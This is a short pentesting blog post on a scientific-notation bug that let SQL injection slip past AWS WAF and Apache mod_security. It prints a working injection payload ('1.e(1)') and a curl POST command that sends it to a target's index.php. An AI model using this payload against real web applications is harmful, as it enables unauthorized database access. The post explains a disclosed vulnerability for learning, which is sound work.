Scientific Notation bug bypass AWS WAF protection

AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack showing the scientific notation:

"x=1' or 1.e(1) or '1'='1"

Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.


Posted

in

by

Tags:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *